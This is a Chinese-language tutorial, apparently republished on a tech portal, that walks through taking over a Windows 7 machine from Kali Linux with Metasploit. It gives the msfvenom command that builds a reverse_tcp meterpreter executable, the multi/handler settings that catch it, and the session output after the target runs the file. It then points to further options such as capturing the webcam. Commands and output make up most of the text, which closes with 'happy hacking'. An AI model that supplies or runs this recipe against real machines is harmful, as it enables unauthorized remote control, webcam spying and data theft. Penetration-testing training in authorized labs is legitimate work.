自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

如何使用 Kali Linux 黑掉 Windows

系統(tǒng) Linux 系統(tǒng)運維
Metasploit 項目中 Metasploit 框架支持 Kali Linux 平臺,Metasploit 是一個用于開發(fā)和執(zhí)行安全利用代碼security exploit的工具。

[[183419]]

Kali Linux 派生自 Debian Linux,主要用于滲透測試,擁有超過 300 個的預(yù)安裝好的滲透測試工具。Metasploit 項目中 Metasploit 框架支持 Kali Linux 平臺,Metasploit 是一個用于開發(fā)和執(zhí)行安全利用代碼security exploit的工具。讓我們來使用 Kali Linux 來攻破 Windows 吧。請注意,我寫這篇文章只是出于教育目的哦——一切因此帶來的后果和本文作者、譯者無關(guān)。

源機器詳情

Kali Linux

  1. root@kali:/# uname -a 
  2. Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux 
  3. root@kali:/# 

用做攻擊對象的目標機器:

  1. Windows 7 Ultimate SP1 

步驟 1:創(chuàng)建 Payload 程序

Payload 是一個類似于病毒或者木馬的程序,可以運行在遠程目標上 —— 為了黑掉那臺機器。可以通過以下命令來創(chuàng)建 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。

  1. root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe 
  2. No platform was selected, choosing Msf::Module::Platform::Windows from the payload 
  3. No Arch selected, selecting Arch: x86 from the payload 
  4. No encoder or badchars specified, outputting raw payload 
  5. Payload size: 333 bytes 
  6. Final size of exe file: 73802 bytes 
  7. Saved as: /root/program.exe 
  8. root@kali:/# ls -la /root/program.exe 
  9. -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe 

通過 ls 命令,我們可以確認 Payload 程序是否成功生成在指定的位置。

步驟 2:運行 mfsconsole 命令啟動 msf 命令窗口

  1. root@kali:# msfconsole 
  2.                                    .,,.                  . 
  3.                                 .\$$$$$L..,,==aaccaacc%#s$b.       d8,    d8P 
  4.                      d8P        #$$$$$$$$$$$$$$$$$$$$$$$$$$$b.    `BP  d888888p 
  5.                   d888888P      '7$$$$\""""''^^`` .7$$$|D*"'```         ?88' 
  6.   d8bd8b.d8p d8888b ?88' d888b8b            _.os#$|8*"`   d8P       ?8b  88P 
  7.   88P`?P'?P d8b_,dP 88P d8P' ?88       .oaS###S*"`       d8P d8888b $whi?88b 88b 
  8.  d88  d8 ?8 88b     88b 88b  ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b 
  9. d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88 
  10.                           .a#$$$$$$"`          88b  d8P  88b`?8888P' 
  11.                        ,s$$$$$$$"`             888888P'   88n      _.,,,ass;: 
  12.                     .a$$$$$$$P`               d88P'    .,.ass%#S$$$$$$$$$$$$$$' 
  13.                  .a$###$$$P`           _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$' 
  14.               ,a$$###$$P`  _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS' 
  15.            .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$' 
  16. _______________________________________________________________   ,&$$$$$$'_____ 
  17.                                                                  ll&&$$$$' 
  18.                                                               .;;lll&&&&' 
  19.                                                             ...;;lllll&' 
  20.                                                           ......;;;llll;;;.... 
  21.                                                            ` ......;;;;... .  . 
  22. Taking notes in notepad? Have Metasploit Pro track & report 
  23. your progress and findings -- learn more on http://rapid7.com/metasploit 
  24.        =[ metasploit v4.12.22-dev                         ] 
  25. -- --=[ 1577 exploits - 906 auxiliary - 272 post        ] 
  26. -- --=[ 455 payloads - 39 encoders - 8 nops             ] 
  27. -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 
  28. msf > 

步驟 3:進行漏洞利用的細節(jié)

  • 4444 端口:你可以按照自己的想法來選擇使用哪個端口
  • LHOST IP:表示 Kali Linux 機器的 IP,這里是 192.168.189.128。 使用如下命令來查看你的 Kali Linux 機器的 IP。
  1. root@kali:/# ip r l 
  2. 192.168.189.0/24 dev eth0  proto kernel  scope link  src 192.168.189.128  metric 100 
  3. root@kali:/# 

現(xiàn)在在 msf 命令窗口使用 use exploit/multi/handler 命令,如下:

  1. msf > use exploit/multi/handler 
  2. msf exploit(handler) > 

然后在接下來的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp:

  1. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
  2. payload => windows/meterpreter/reverse_tcp 

現(xiàn)在使用 LHOST 和 LPORT 來設(shè)置本地 IP 和本地端口,如下:

  1. msf exploit(handler) > set lhost 192.168.189.128 
  2. lhost => 192.168.189.128 
  3. msf exploit(handler) > set lport 4444 
  4. lport => 4444 

最后使用 exploit 命令。

  1. msf exploit(handler) > exploit 
  2. [*] Started reverse TCP handler on 192.168.189.128:4444 
  3. [*] Starting the payload handler... 

現(xiàn)在你需要在 Windows 上運行 program.exe,一旦它在目標機器上執(zhí)行,你就可以建立一個 meterpreter 會話。輸入 sysinfo 就可以得到這臺被黑掉的 Windows 機器的詳情。

  1. msf exploit(handler) > exploit 
  2. [*] Started reverse TCP handler on 192.168.189.128:4444 
  3. [*] Starting the payload handler... 
  4. [*] Sending stage (957999 bytes) to 192.168.189.1 
  5. [*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000 
  6. meterpreter > sysinfo 
  7. Computer        : MANN-PC 
  8. OS              : Windows 7 (Build 7601, Service Pack 1). 
  9. Architecture    : x64 (Current Process is WOW64) 
  10. System Language : en_IN 
  11. Domain          : WORKGROUP 
  12. Logged On Users : 2 
  13. Meterpreter     : x86/win32 

一旦你得到了這些詳細信息,就可以做更多的漏洞利用,或者通過 help 命令獲取更多信息,以便列出你可以黑掉該系統(tǒng)的所有選項,比如 webcam_snap 命令獲取網(wǎng)絡(luò)攝像頭,同樣你還可以使用其他更多的可用選項。祝你入侵愉快!!!!

責(zé)任編輯:武曉燕 來源: Linux中國
相關(guān)推薦

2015-04-27 13:54:10

2015-05-11 10:16:20

2010-01-18 10:01:56

2017-03-16 18:50:59

2010-12-01 12:37:03

2014-09-28 09:34:17

2015-06-11 10:03:05

2015-08-11 14:10:25

2024-08-14 08:33:20

2015-05-12 10:08:54

2016-11-16 15:44:01

2015-08-17 15:17:09

2014-08-28 09:48:41

2014-06-11 09:30:53

黑客ATM取款機

2012-08-15 10:23:32

2014-02-21 13:02:44

2021-09-21 15:31:05

Kali LinuxVMware安裝

2014-02-11 13:49:00

2017-03-14 08:38:54

2023-07-04 16:28:23

點贊
收藏

51CTO技術(shù)棧公眾號